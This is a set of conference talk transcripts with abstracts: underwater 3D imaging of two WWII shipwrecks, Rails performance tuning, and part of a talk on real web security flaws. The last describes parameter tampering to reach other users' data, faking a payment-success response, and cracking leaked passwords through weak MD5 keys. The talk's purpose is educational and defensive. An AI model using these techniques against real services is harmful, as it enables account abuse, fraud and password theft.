It's like doing a pirouette around the item and then also did a second one at a different height. So essentially we photo bombed the site. The process of 3D reconstruction is also known as 3D photogrammetry or structure from motion. It's primarily based on the use of still images but we can also use frame grabs from the video sequences as well to provide more coverage if we need it. So a shot of the same image just from a different angle. What we do need is lots of angles, good coverage to enable us to generate high quality models. So the actual technique of 3D reconstruction, let me tell you a little bit more about that. Every image has to have a process of features identified in the image. Then those features are matched between photographs. So every photograph is compared to every other photograph and each of these line segments here represent a matched feature in one image joined up with a matched feature from the other image. Those matches are then put through into an algorithm called a bundle adjustment which allows us to calculate where all the cameras were and also generate a very sparse point cloud. People often ask, did you have to have accurate tracking on the cameras and the power of this approach is no you don't. The positioning of the cameras is actually determined from the subject that you're filming. Assuming that the item that the subject you're filming is not moving, you can determine very accurately where the cameras are positioned when they were taking the photograph. From that, once we know the camera positions, we can then back calculate and perform a denser match and generate a much denser point cloud. So these are all points in 3D space. We can rotate that around and see all those points in 3D space. Another algorithm is then applied to produce a mesh over the surface of the point cloud and then finally the images from the cameras are laid back, projected onto those surfaces to provide a photographic texture to those models. So what you've got then is a very accurate digital 3D model of the item that you filmed and all of this process is fully automatic. So all of the 3D models you have seen in the documentary so far and I'll show you in a few moments are all completely automatic processed. We haven't done any post-processing or human in the loop at this stage but we will be using that approach to improve the quality of the models. So these are, this is actually two of the ship's boats sitting above each other. Once you've got a digital 3D model like this there's a lot you can do with it. You can produce a stereoscopic video like this. We can also go to techniques of 3D printing to generate physical reproductions of the artifacts from the seafloor. So you can see that the top boat has had a catastrophic collapse. There's another boat sitting over the back there. These aren't in accurate placement of the original location. Now we're flying across to a reconstruction of the bow of the Sydney and along here you can see some of the rusticles that are hanging off. This is all generated from the 3D models and if I had my supercomputers, not supercomputers but visualisation machines here we'd actually be able to fly through this in real time. It's quite an empowering process to be able to just fly through and just explain different items to people as they ask in quite an interactive experience. So we spent probably an hour and a half photographing just the bow. I think around 5,000 images and that's allowed a very complete model of the bow itself. 
The boats are showing quite a lot of degradation. They're made of wood so they are being eaten away and degraded very quickly. The Sydney itself though is in remarkably good condition. So where to from here? We've got lots of data processing ahead of us using the 3D reconstruction software. We're quite privileged to have access to the fastest public access supercomputer in the southern hemisphere just across the road from our university. It's called the Pawsey Supercomputer and we're using that to generate the 3D models of items from the debris field and also hopefully, fingers crossed, the full main hull of both wrecks. The results of the project will be developed into museum exhibitions which will be shown at the WA Museum. They've got several locations in Western Australia, as well as partner institutions around Australia, and we're also hopeful that there may well be some institutions in Germany that might be interested in taking it on. As I mentioned, the 3D documentary feature has been produced by Prospero Productions. There's also a range of research outputs from the project. A number of the aspects of this project are really on the bleeding edge, and when I say bleeding edge, I'm being truthful as well. So the 3D reconstruction techniques and also the processing of the science samples are leading to some very solid research outputs as well. Thank you.
|
In April/May 2015, a team led by Curtin University, WA Museum and DOF Subsea conducted a 3D imaging survey of the two historic shipwrecks HMAS Sydney (II) and HSK Kormoran. The Australian vessel HMAS Sydney and the German vessel HSK Kormoran encountered each other in the midst of World War II on the 19th of November in 1941 off the Western Australian coast. After a fierce battle both ships sank each other and they now lie in 2500 m (8200 feet) water depth, 200 km (125 miles) offshore from Shark Bay. This event is Australia's largest loss of life in a single maritime disaster - with the entire crew of 645 perishing on the Sydney and 82 crew lost on the Kormoran. The exact location of the two wrecks remained unknown for almost 70 years until they were discovered in 2008. The aim of the 2015 expedition was to conduct a detailed 3D imaging survey of the two wrecks and their extensive debris fields. A custom underwater lighting and camera package was developed for fitment to two work-class underwater remotely operated vehicles (ROVs) as often used in the offshore oil and gas industry. The camera package included six 3D cameras, and fourteen digital still cameras fitted across the two ROVs intended to capture feature photography, cinematography and 3D reconstruction photography. The camera package included six underwater stereoscopic cameras (three on each ROV) which captured a mix of 3D HD video footage, 3D stills, and 3D 4K video footage. High light levels are key to successful underwater photography and the system used a suite of ten LED underwater lights on each ROV to achieve artistic and effective lighting effects. At the conclusion of four days of diving, the team had collected over 500,000 stills and over 300 hours of HD footage. The collected materials will contribute towards the development of museum exhibitions at the WA Museum and partner institutions, and the development of a feature documentary. Another key technology being deployed on this project is photogrammetric 3D reconstruction which allows the generation of photo-realistic digital 3D models from a series of 2D photographs. These digital 3D models can be visualised in stereoscopic 3D and potentially 3D printed in full-colour to create physical reproductions of items from the sea floor. This presentation will provide an overview of the expedition, a summary of the technology deployed, and an insight into the 3D imaging materials captured. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/31493 (DOI)
|
So, this talk is titled 3x Rails, but what does this title mean? This talk is about speeding up the Rails framework, but I'm so sorry, I kind of failed to bring something like, hi guys, I brought a magical patch that makes Ruby on Rails three times faster, so let's just merge this and release Rails 5 now. I kind of planned to do this on stage, but I'm sorry, I failed. So instead I'd like to discuss some possibilities or points of view. So again, what does the title 3x mean? Actually this title is inspired by Matz's keynote at RubyKaigi last year, and RubyConf I think. In that keynote, Matz promised that Ruby 3.0 is going to be three times faster than Ruby 2. So what's happening? Well, it's actually so easy to make Ruby on Rails three times faster. So easy because everything we need to do is just not make any more performance regressions on the Rails side and wait for Ruby 3. Then run your Rails applications on Ruby 3. That obviously should be three times faster Rails. Yeah, win. So anyway, my name is Akira. I'm on the internet as @a_matsuda, like this. I work on some open source projects like the Ruby language and the Rails framework. Also I authored and maintain some gem libraries like Kaminari, the pagination library, ActiveDecorator, Motorhead, stateful_enum, et cetera, et cetera. And I run a local Ruby user group called Asakusa.rb in Tokyo. Asakusa.rb was established in 2008. We're meeting up on every Ruby Tuesday. And we have had 356 meetups so far. We have so many Ruby core committers among our members, like more than 30 people. And we had attendees from like about 20 different countries from all over the world. So it's quite a global local group, right? We welcome every visitor from any other countries, I mean countries that are not listed here. So if you're interested in visiting our user group and if you have a chance to visit Tokyo, please contact me and come to a meetup. Also I'm organizing a Ruby conference in Japan named RubyKaigi. RubyKaigi aims to be the most technical Ruby conference, focusing on the Ruby language itself. Last year's RubyKaigi was like this. And this year we're having another Kaigi in September in Kyoto. Please note that the conference is not in Tokyo this year. Kyoto is an ancient capital of Japan. There remain so many historical temples and shrines, gardens and so on, like shown in these pictures. I just Googled Kyoto. This is the result. So I think Kyoto is the most beautiful city in Japan. So if you haven't been to RubyKaigi before and you're willing to, I think this year's one is a really good chance to enjoy both the conference and your trip. So please consider joining the conference. This year's venue looks like this. This is the picture of the main hall. The second hall and venue has a nice looking garden, a Japanese garden. So we're already selling the tickets and the CFP is already open. So please check out the official website and submit your talk or buy your ticket. So anyway, let's begin the actual talk. As I told you, this talk is about speeding up the Rails framework, not your Rails application. To speed up software, firstly we need to know its speed. And in order to measure the speed, we usually use benchmarking software, like for example benchmark-ips or Ruby's built-in benchmark library. I prefer benchmark-ips. For example, if you actually want to measure the performance of your Rails application, you can do something like this. I made a monkey patch, monkey patching Rails.application.call, and we run benchmark-ips. 
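(The slide itself isn't reproduced in this transcript, but a minimal sketch of that kind of benchmark — assuming the benchmark-ips gem and a booted Rails app — might look like this; it is an illustration, not the speaker's actual patch.)

```ruby
# bench_rails_call.rb — a rough sketch: measure only the Rack/Rails side of a request.
require_relative 'config/environment'  # boot the Rails application
require 'benchmark/ips'
require 'rack/mock'

env = Rack::MockRequest.env_for('/')   # a bare GET / request, no browser involved

Benchmark.ips do |x|
  x.report('Rails.application.call') do
    Rails.application.call(env.dup)    # dup because Rack apps may mutate the env
  end
end
```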
It actually kind of runs the request like 100 times. I know it's a horrible, horrible idea, but it kind of works. And it benchmarks purely the Rails part, right? I mean, it skips the browser side. So this outputs some score. So how can we improve the score? That's the topic of today's talk. My first trial is of course Ruby GC, because everyone knows that Ruby GC is so slow. I believed that just stopping GC would improve performance by like 30%. So let's do this first. To observe the GC, we have GC.stat in the core library and we have gc_tracer, which is made by Koichi. So for example, adding GC.stat calls to the previous module shows something like this. It iterates 45 times in five seconds. And it outputs some GC.stat results. It shows that surely GC is happening there, like 50 times, right? So let's stop this. Like GC.disable. Then run the benchmark again. Then I got this result. 50 iterations per five seconds. So the GC adds about 10% overhead in this benchmark. I think that's because Ruby GC has been improving recently, like this; we had so many improvements in the GC module. So GC is actually no longer a 30% overhead. It's just about 10% overhead. Which is, I think, not a big deal. It's acceptable in my opinion. So I'd like to thank Koichi for doing this amazing work. Keep on doing this amazing work. And also thank you Heroku for supporting his activity. Thank you very much Koichi and Heroku. By the way, let me now talk a little bit more about a new Ruby 2.3 feature, somewhat related to garbage collection. About strings. Strings in Rails used to be a big concern of the community. And there actually was a trend of sending pull requests with .freeze, .freeze, .freeze, .freeze in Rails, showing some microbenchmark, which aims to make Rails faster. But honestly, I didn't like that kind of pull request. Because it kind of pollutes the code base. It just looks ugly to me. So I proposed a magic comment to Ruby to freeze all string literals in the file. Just in order to stop the .freeze pull requests. It's like this: frozen_string_literal: true. It's already introduced in Ruby 2.3. It's already available. So if you're interested, you may try. Actually I haven't tried it myself yet. Maybe this will add some performance. Several percent, three or five percent, I guess. Maybe. Anyway, let's stop caring about the strings now. It's already a solved problem, I think. And another Ruby myth is that Ruby is slow because it's a scripting language. We have to parse and compile every time. So it's slower than a compiled language. Is it true? I think it is true. But Ruby 2.3 has a new feature: you can pre-compile Ruby code into a binary. And you can load the binary. I'm not going to talk about this in detail because it's going to be described by Koichi, the implementer himself. So don't miss Koichi's talk tomorrow about this. So which part of our simple Rails application takes time? Let's profile. To measure the whole performance, I used benchmarking software to profile which part is actually slow. We use profiling software like stackprof or rblineprof. But again, I'm not going to describe them in detail in this presentation. Because you may have already heard of these and you may know these tools. These are so powerful and so popular. Maybe you have heard of these before. And also we have TracePoint, which is a built-in library in Ruby. Koichi's work. You can simply count the number of method calls; you can hook into Ruby method calls and put a hook into every method call. 
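(His example slide isn't in the transcript either; a TracePoint-based, method-call-counting Rack middleware in the spirit of what he describes could look roughly like this — the class name here is made up.)

```ruby
# A sketch of a Rack middleware that counts every Ruby and C method call
# made while the rest of the stack handles the request.
class MethodCallCounter
  def initialize(app)
    @app = app
  end

  def call(env)
    counts = Hash.new(0)
    trace = TracePoint.new(:call, :c_call) do |tp|
      counts["#{tp.defined_class}##{tp.method_id}"] += 1
    end

    response = nil
    trace.enable { response = @app.call(env) }

    # Print the ten most frequently called methods for this request.
    counts.sort_by { |_, n| -n }.first(10).each do |name, n|
      puts format('%8d  %s', n, name)
    end
    response
  end
end
```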
So you can count the method calls like this. This is a sample example: a Rack middleware that counts every method call happening inside the Rack middleware stack. So with this middleware, I get this output from my scaffolded Rails application. The most frequent method calls are SafeBuffer html_safe and html_safe?, escape HTML, attribute something, things like this. However, these are just theories, and I'm sorry, I'm going to talk about something different today, from my experience. I know some weird parts of Rails, weak parts of Rails, slow parts of Rails. I'm going to talk about some of these in the rest of my time. So Rails consists of MVC. Which one do you think is the heaviest part? How about ActionPack, the C part? ActionPack sits on top of so many Rack middlewares that it would make the method call stack very deep. Maybe that would be a bottleneck. And actually Rails 5 introduces a new feature called Rails API in order to reduce this Rack middleware depth, I think. So let's measure. This is a very, again, very roughly written Rack middleware benchmarking tool. This outputs how long it took for each Rack middleware. And I got a result like this. Less than 0.00-something for every middleware. So it turns out there's no slow middleware in the default stack. I don't actually see any other particularly slow part in ActionPack, actually, besides route resolution and URL helpers, which I'm not going to talk about today. So let's leave ActionPack. And let's see this list again. There are some safe buffer things and escape HTML things, which is obviously ActionView. ActionView actually has some performance problems. I know that. So ActionView consists of roughly these processes. It looks up the template, compiles the template, and returns the HTML strings to the browser. So let's start with the template lookup. The current implementation of template lookup is like this. It calls Dir.glob for every single template lookup. So the resolver queries the file system per each request, actually per each render: render layout, render partial, each render. All right. Couldn't we speed this up? So I tried to make a more optimized resolver over the default optimized resolver. The concept is like this. Just read the whole file system once and cache that. Cache all the template file names in memory. So this is the trial implementation, which is already on GitHub. This basically just scans through the view path directory only when the application gets the first access. Then it caches all the file names. Then it performs the view file name comparison in memory, as I told you. And here is the benchmark proving the speed. And the result is like this. My version of the template resolver is 18 times faster than the default resolver. In a very carefully crafted microbenchmark. So another issue, I think, is render partial. Render partial is basically slow because it creates another buffer per each render partial. But in some cases, we don't need a new view context for each partial, like simply rendering a footer, header, et cetera. So we probably can do something like PHP include and simply concatenate the partial into the parent template. And the implementation is, I'm sorry, still work in progress. This wasn't as easy as I expected. So another idea is we can pass the full path file name into the render partial call so that the template resolver doesn't have to look up all the view paths. 
The API will look like this: render_path with a full path file name, or render_relative, like require_relative in Ruby. The implementation is, again, not yet done. Another idea about rendering is render parallel. So we can parallelize render collection. So if you have a collection of 100, maybe we can make the render collection 100 times faster using threads. I actually tried this, but I saw so many "too many connections" errors from the database adapter. It's obvious. So this turns out to be a failure, I think. Another render method is render remote, which performs rendering via Ajax, particularly for a very heavy partial. Here's an implementation, which I did like two, three years ago. I found a repository. I looked at the repository like yesterday, but I forgot what the name means. Anyway, the API is like this. Very simple. Add remote: true to your render call. Then this would perform the render partial call through Ajax. It kind of already works. I'm sorry, but I'm not using it. So another topic is encoding support in template rendering. The current implementation of compiling the template into a Ruby method is like this. It first dups the given template source, the whole template string, and force-encodes the source — sorry, the source text — to binary, and dups the given template source again for detecting the magic comment, the encoding magic comment, then force-encodes again. For some reason. And finally, encodes in ERB. So many encoding conversions. But who needs this feature? Who actually writes a non-UTF-8 view file in your application? If any one of you does, please raise your hand. Wow. No? No? Okay. So nobody in this room actually uses this feature. Actually we, sorry. Okay. That might be possible, I think. But the actual use case is probably for Japanese people. Because I see test cases like Shift_JIS, which I think were written by Yehuda. But I'm sure nobody does this in Japan. It's just ridiculous. So the current state is nobody needs this feature. So we can just remove this. So here's my suggestion. Let's do this. So here's a benchmark for this new version of the ERB handler. And this is the result. It kind of shows some improvement, but only 1.5 — 1.5 times faster. Because in this case, it includes the whole compilation process on the ERB side, not just the encoding conversions. And moreover, this would reduce the memory consumption, I suppose. So let's profile that with memory_profiler. The code looks like this. Benchmarking the memory consumption in, again, benchmark-ips. Inside the block that repeats the whole, like, template resolution. And the result is like this. It kind of shows some memory reduction in string objects. And in my opinion, memory usage is very important. It's about speed, actually. Because if we could reduce this, then we could put more containers, I mean, web workers, in the web application container. So this really is about speed, right? So I'd like to propose removing the encoding support, maybe in Rails 6. So by the way, this is about the ERB handler. So if you're using Haml, we have some alternative implementations like this. So please try using these instead of the official Haml. The next topic is ActiveSupport::SafeBuffer. As we saw in the method calls graph, we call this so many times, and it is currently a very ad hoc implementation. It has a flag inside the string object and flips the flag on and off. So I tried to use Ruby's built-in tainted flag, but I failed. 
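(For context on the flag he's talking about, here's a quick illustration of existing ActiveSupport::SafeBuffer behaviour — this just demonstrates the current API, not his proposed replacement.)

```ruby
require 'active_support/core_ext/string/output_safety'

plain = "<b>hi</b>"
plain.html_safe?       # => false

safe = plain.html_safe # returns an ActiveSupport::SafeBuffer with the flag set
safe.html_safe?        # => true

# Concatenating an unsafe string onto a SafeBuffer escapes it first:
safe + "<script>alert(1)</script>"
# => "<b>hi</b>&lt;script&gt;alert(1)&lt;/script&gt;"
```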
But maybe we could make a faster version of SafeBuffer somehow, maybe as a C extension, I guess. The next topic is I18n. Sorry, I have only five more minutes, so I'll speed up my talk. Again, it's not yet done, but I have some work in progress on this machine, which I'll probably publish within a few days. The next topic is Active Record, and I have four minutes for Active Record. So my main concern about Active Record is Arel objects when building queries. It just builds so many Arel objects, Arel node objects. So what if we directly build SQL strings from the find or where parameters for very simple queries, like just where name equals something, or find by ID? It's still not published, but it's almost working. And the product is called Array9. This is the implementation, the example. If the find call accepts some complex parameters, then it will pass the query to super. But for the simple ones, like find by ID or find by an ID string, it directly compiles the SQL query. This is actually very cheap. It's cheaper than compiling the cache — the Arel node cache for, what's that? What's the name? Adequate Record. I'm going to skip this part. So my next topic is model present?. My advice about model present? is never, never call model.present?, because it causes massive method calls inside. If you call, for example, current_user.present?, how many method calls will occur? So this is the answer. I see 85 method calls just for user.present?, which is ridiculous. So I suggested a patch fixing this situation, but this got turned down because the Rails core team expects you not to do this. So please don't call the present? method on your Active Record model, or put something like this in your application. I think I have no time to run through all these slides. But this is about speeding up the Rails initializers. This is about not requiring pry-doc, pry-byebug, pry-anything in your Gemfile. This is about squashing all bundled gem files into one directory, which is currently not yet working. Using require_relative instead of require, which didn't show any significant speed improvement. Detecting autoload, which causes some speed regression in the production environment. Actually I found two occurrences of autoload in production in Rails 5, which happen inside Rack 2, so please fix this. Speeding up tests. Previously our application took one minute on CircleCI just for preparing the schema, inserting 600 entries into the schema_migrations table. So I changed this to one single query, which is, in our case, 600 times faster. This is already committed into Rails 5. So it's available in Rails 5. Some slow parts in Active Support, like multibyte and time zones. So, multibyte. It consists of Multibyte::Chars and Multibyte::Unicode. It loads the whole Unicode database version 8, which sits inside the Active Support library, but whether anyone actually needs this, I'm not sure. And I suppose at least we Japanese don't use this. So we can just remove this in our case and make the framework smaller and make the boot time faster. The next one is TimeWithZone. Here's a benchmark for Time versus TimeWithZone. What it shows is that TimeWithZone is 25 times slower than the built-in Time. So if you're sure you don't need TimeWithZone, you can just replace your TimeWithZone with Time. I mean, if you're 100% sure what you're doing. 
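(A minimal version of that kind of comparison, assuming the benchmark-ips gem and somewhere Time.zone is configured, such as a Rails console:)

```ruby
require 'benchmark/ips'

# Run in a Rails console, or set Time.zone = 'UTC' first outside of Rails.
Benchmark.ips do |x|
  x.report('Time.now')      { Time.now }
  x.report('Time.zone.now') { Time.zone.now }  # returns ActiveSupport::TimeWithZone
  x.compare!
end
```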
Some of these are already introduced into recent versions of Ruby. So please just use new versions of Ruby, which will bring you the speed. Okay, sorry for going over time — conclusion. So there is really no one single performance bottleneck for everyone, for every Rails application. Some apps might have 1,000 models, some apps might have 3,000 lines of routes.rb, and the bottlenecks will change. So in my opinion, Rails is omakase, which is nice, but in some cases we want to customize certain points of the Rails framework. Maybe what we need is more flexibility, like Merb used to have. So there are so many slow parts in Rails, and there can be more alternatives to these parts of Rails. So I would suggest making Rails more flexible, to be like Merb a little bit, and I hope everyone here will reveal your hacks and bring more modularity and diversity into the Rails community. Okay, thank you. Thank you very much. Okay, good.
|
Matz declared that the next major version of Ruby is going to be 3x faster than Ruby 2. But how can we make a software 3x faster? Can we do that for Rails? In this session, we will discuss the ways to survey performance hotspots in each layer of the framework, tuning techniques on the performance issues, and some actual works that you can apply to your apps. Topics to be covered: speeding up DB queries and model initialization; view rendering and template lookup; routes and URLs; object allocations and GC pressure; faster Rails boot and testing; Asset Pipeline tweaks.
|
10.5446/31587 (DOI)
|
We have like three minutes before we're supposed to start, but like who was here for Mike's talk just a few minutes ago? Okay. So this is like part two. Just when you thought it was safe to go back on the web. So Mike, you know, he covered some specific problems and then like some breaches that have happened. And when I, this was like, you know, a week ago or so, I saw, like I knew he was speaking and I've known him. We use their product. So I sent him an email and I was like, hey, actually your talk sounds really similar to my talk. You're like talking about breaches that have happened and I thought I'd go through some real things that have been found. And I was like, here's my list of things that I might talk about. Does this conflict with anything you're talking about? And I couldn't believe it. He wrote me back and he's like, I'm not talking about any of those. Although he did kind of lie because he mentioned Ashley Madison, but he didn't really talk about it. So if you were in that talk, this is kind of like a similar talk except sort of the details of vulnerabilities that have been found in different people's sites. So if you were, in case you were curious about this talk versus that talk. Also I just like to talk. So when I get up here, I like to talk. We have one minute before we're officially supposed to start. I like to use vacation pictures now for my title slides and this is Meteor Crater in Arizona. It's actually the first crater that anyone actually figured out came from a meteor. In fact, for a long time they thought it was like a volcanic thing. So yeah, this is, in case you're wondering, it's pretty big. I don't remember exactly how big, but it's pretty big. There you go. Yep, yep, yep. No, no, it's not that big. Well, so you would have to have detection, right, and then you would probably have to have some way of avoiding it or deflecting it, right? All right, so I should start the real talk. My name is Justin Collins, @presidentbeef on Twitter and most of the Internet. I wanted to give this talk. I've actually heard people say phrases very similar to this. In fact, I heard at least one person say it this week. Not quite like, you know, I believe Rails is going to do everything for me, but sort of that question of like, well, but isn't Rails pretty good at security? Doesn't it kind of do a lot of stuff for me? And so I thought it was a good title for this talk. And so the question is, doesn't Rails take care of security for me? The answer, no, it doesn't. And that's all I have. Thank you. This is... I would have put up pictures of my cats, but everyone does that and mine are not as funny looking as Aaron's, so here's my turtle instead. Okay, so some more details, I would guess. I hate doing these slides, but it's somewhat relevant. This is... I believe Snapchat shows you your soul, so this is what my soul looks like. I've been doing application security for about six years and working on the Brakeman open source project for essentially the same amount of time. Last couple years working on Brakeman Pro, if you just need to be more professional about your security tools. If you really like Brakeman, but you don't feel like you need the Pro version, but you want to support Brakeman, you can buy licenses for Brakeman Pro and you don't have to use them, but you can buy them and that will support the open source project. Okay, so that's all I'm... That's the sales pitch. 
Okay, so this talk, I already kind of told you what it was, but if you're looking for what Rails does give you and what Rails does not give you, I gave a talk last year. That was the vacation to the Grand Canyon — about kind of the security things that Rails does well, things it doesn't do well, things I wish it would do better. Then Bryan Helmkamp a couple years before that gave a talk about Rails insecure defaults, some of which have changed in the meantime, so that's good. So if you're interested kind of in that topic, which is not what this talk is about, you could watch those. In between those two talks, I did a talk with Aaron Bedra and Matt Konda, where we kind of did a hypothetical scenario where we acted out like, oh, we're developers and we wrote really bad code and these are all the things that are happening because of it. I don't know how well that went over, but this talk is kind of like that except this is all real. These all come from public disclosures, mostly from bug bounties, sometimes from people who didn't necessarily get a bounty out of it. I'm not picking on these companies at all. I like most of these companies and I'm sure they're great, especially Twitter since I work there. These are just the well-done write-ups that I could find so that I could share with you — not to just pick on Mike — not just like, there's SQL injection, but what actually happened. None of these are things that Rails will save you from, essentially. Let's start with Twitter. Like I said, I work there, so I feel like I can share this. It's public anyway, but just letting you know I'm not picking on them. Let's get into it. A researcher was looking around on our ad site and he noticed something that when you put in a credit card and we check it and we go, oh, that's not a valid credit card. You get this little modal and it's like, oh, you know, we weren't able to approve that card. Then you have two options of what to do with it. One is try again and the other one is dismiss. He noticed what happened when you hit dismiss: there's a method that gets called, a URL that gets hit. You can see there's the account ID and this is actually the bug bounty researcher's account. Then payment_methods, handle_failed, and then an ID. I'm starting off the talk. This is a Rails app we're talking about. You know that thing at the end is probably the ID for the payment method. He noticed what would happen is the payment method would go away. He's looking at this number. This is probably the ID of the payment method. What if I just changed it? Does that still work? Is that going to delete that payment method? Well, it turns out on the back end there was code that looked something like this where it looks up the payment method from the ID parameter and it deletes it. I still think when I was making these, I'm like, that's so weird that dismiss deletes it, but that's another thing. This is exactly what was happening. In the web security world, this would be considered an insecure direct object reference. It's a direct object reference because that ID is the row in the database. It's insecure because we're not checking that the person who's deleting that row actually owns that row. There's another term for this exact thing right here, which is an unscoped find. I don't think I came up with this term, but then I searched and it doesn't seem like anyone else uses it. In Rails, you can scope your finds or you could not scope them or you could unscope them. This is a find that wasn't scoped properly. 
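(Neither code slide is reproduced in the transcript, but the pattern he's describing amounts to something like this — the model, association and action names here are my guesses, not Twitter's actual code.)

```ruby
# Vulnerable: an unscoped find. Any signed-in user can delete any
# payment method at all just by changing the id in the request.
def dismiss
  payment_method = PaymentMethod.find(params[:id])
  payment_method.destroy
  head :ok
end

# Scoped: look the record up through the current user, so a payment
# method that doesn't belong to them is simply not found.
def dismiss
  payment_method = current_user.payment_methods.find(params[:id])
  payment_method.destroy
  head :ok
end
```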
The way you should do this is to scope it to the current user and then do your find for the payment method and then delete it. For this, we paid out $2,800. I'm fairly certain that was our largest bug bounty payout to date. Why? Because someone could delete all of our customer's payment cards and that's how Twitter makes money. It's from people paying for ads and you can imagine that would be a huge loss for us. Thankfully, they reported it to the bug bounty. We paid them $2,800. Next up, United. I put the links for later if you want to read the write-ups from the people who found these. In this case, there's a guy. United launched a bug bounty program, kind of famous because they're like, we'll reward you in reward miles, which is kind of not a lot of companies give you that. But then you have to fly United. So anyways, he was looking and what he was doing, he was just proxying the traffic from the mobile app just to see kind of what was going on. He noticed there was a request. Is that on the screen for you? Sorry, it's a little bit off. The details don't really matter. It's making a post request. I cut out some stuff, but he noticed in the request, there's MP number. So United, they have mileage plus or something like that. Yeah, okay. I don't fly them. So mileage plus number and he thought, oh, that's kind of like my user ID. What if I change that? You might notice a trend here. So he's just like, what if I change it to someone else's number? What would I get back? And he got back a whole bunch of information. I know this is kind of small, but I'm going to zoom in, including what flight they're on or what flight they're booked for, their name, where they're going. Is it late? When's it coming? When it's going? Every leg of the trip, there was a whole bunch of more information. Well he noticed in particular, there's a record locator and there's a last name. Any guesses as to why those might be important? Yes, exactly. So what do you do when you check into a flight? What do you do when you need to look up a flight and you didn't create an account on the airline's website? You put in your record locator and your last name. So the reporter, you found this. You can kind of see that. He noticed that, yeah, you can go on. All you need is that number and last name. And there's a list here of all the things you can do. Look at your reservations, change it, cancel it, get a receipt. Another thing he mentioned is you can see the person's emergency contact information. So whoever they put in for their emergency contact, you can see that. All you need is a confirmation number, last name. And you can look that up for any mileage plus member number. So that's pretty bad. There was some drama because he reported it to them and they didn't fix it for a long time and then he threatened to publicly disclose it and then suddenly it was fixed and they're like, no, no, no, we were working on it the whole time. And by the way, your report was a duplicate, so we're not giving you any money, which happens a lot in Bug Bounty and being on the other side, it just happens. But he didn't get any money for that. I guess it was a pretty obvious thing that other people found. All right, Domino's Pizza. I don't eat a lot of Domino's, but I seem to recall the name came from them having rectangular shaped pizzas, which they, like, do they even have those now? Oh, yeah, maybe? I don't think I'm that old that you don't remember square pizzas and I do. Not that old for sure. Okay. 
So again, someone was, actually in this case it was kind of interesting because he was actually looking for something else. He was curious how they generated, apparently sometimes on the mobile app they would give you like a random coupon for $10 off or something. And so he was actually looking for that, but what he found instead is the way the payment system worked was the phone actually handled the payments. So you put in your credit card number, it would send it to the payment processor. Payment processors look like this. You just kind of shove your credit card into your laptop screen. And then it would send back, okay, that was successful and here's sort of the transaction ID or the reference number for that credit card transaction and then the app would send it to Domino's with your order and then they would make your order for you. So he thought, right, and if there's a failure it just doesn't send it to Domino's, right? So he thought, oh yeah, I gotta tell you, there's some XML ahead. If you need to avert your gaze, it's fine. It's not that bad though. So this is what would come back from the payment processor. If it failed, let's say not authorized and then there was a reason, it was declined and then a status number and we assume seven means declined for some reason. So he thought, what did he think? What if I changed it? Yes, catching on. What if I just set that to success? As far as I know he didn't change anything else, just change it to success and then I'll send that on to Domino's. So it kind of looks like this, it failed but we're gonna just change that to success, send it to Domino's and then he had no idea if this would work, of course. So he checked his app and he sees, well, it says they're working on it but you know how mobile apps are. Maybe it's just like a UI thing or something. So he called them and said, hey, did you get an order from me? And they're like, yeah, we're working on it. We're gonna, we'll get it to you 30 minutes, whatever it was. And he felt kind of bad about it. He felt kind of bad about it so he did pay for it. When the guy showed up he was just like, oh, I think there was a mistake. Here's the money for it. So he didn't actually get a free pizza out of that. But in this case, it's simply that the server didn't check that what the client told it was true. It had the reference number from the payment processor. All it had to do was ask the payment processor, hey, I got this ID, was it successful? If they had just done that validation, no problem. And so a theme in the security world really is that you shouldn't trust anyone. And I was thinking about that because I thought I would just tell you don't trust anyone. But when you're building an application, you actually do have to trust some of the things that are sent to you, right, depending on where it comes from. So the main thing is you need to know, think about who you're trusting and what you're trusting and if you should, right? So unfortunately, you can't just trust no one. All right. So talk about Ashley Madison. I included their motto or tagline here because I think it's like a total logical fallacy. Life is short, so have an affair. It's like, well, life is short. So make your life even worse by ruining it. So they had a whole bunch of information stolen. I don't know how it was stolen. I'm not talking about how it was stolen. But part of what was stolen, database dumps and source code. But interestingly, not just source code, but Git repos, which is very interesting, right? 
It will become apparent in a moment why that's interesting. So in that, about 36 million passwords; however, they were hashed with bcrypt, which is maybe not like top of the state of the art, but pretty much recommended — use bcrypt with, you know, a decent work factor — which they were doing. So that was good. And at the time, not that long ago, but at the time, a lot of people were like, oh, okay, we got to start like trying to crack the bcrypted hashes so we can get the passwords. But there was a group that took a different approach. I got to warn you, though, again, even worse than last time, there is some PHP code ahead, but it's not that bad. I think you will survive. I almost rewrote it in Ruby, but it was actually kind of longer and I wanted to fit it on. So they found some code and it's calculating this login key. And we actually don't care what that was for. All we care about is the login key was in the database associated with a user. So they saw this code and they say, okay, well, it's an MD5 hash. That's a red flag. It's got the username and it's got the password in it. And for some reason, they're lower casing both of those, which just makes this whole thing worse. But they're encrypting it first. So now we're dealing with the hash of a bcrypted password, so that's not very useful if I'm trying to crack the passwords. So then they looked in the Git history and they found that this code used to look like this. So it used to just hash the lower cased password directly. So that was pretty interesting because they knew the username and they knew the login key and they know how it's constructed. So now you can calculate, I believe it's billions of MD5 hashes a second. So this was a good place to start. There was another piece of code, though. And here lc means lower case. Weirdly, this was also to calculate a login key. So in this case, they had username, password, email, and then this secret key. But remember, we have all their database and all their source code, so the key is not secret, the username is not secret, the email is not secret. The only secret is the password. So this was another avenue that they decided they could use to try to crack these hashes. So they started doing this. About 2.5 million passwords were cracked. They didn't say exactly how long, but they said in a few hours they had this. And remember, there were all these other people who were trying to crack the bcrypted passwords, which would probably take years and years and years. So in a few hours, they had 2.5 million passwords. In a few days, I didn't follow up with all of it, but the second post they did, they said they had almost 12 million passwords that they had cracked. To be fair, and I don't have a link to that post, but you could probably find it, most of those passwords were pretty awful passwords. So this is, I think this is an interesting story because they were doing the right thing. They were using bcrypt for storing their passwords. But then on the side, they were doing something with a much weaker hashing function. And that led, I mean, I guess I should say researchers and attackers to be able to crack the ones that were using the much stronger hash. And if you're paying attention, yes, they were lower casing the password, but most of the passwords were all lower case. 
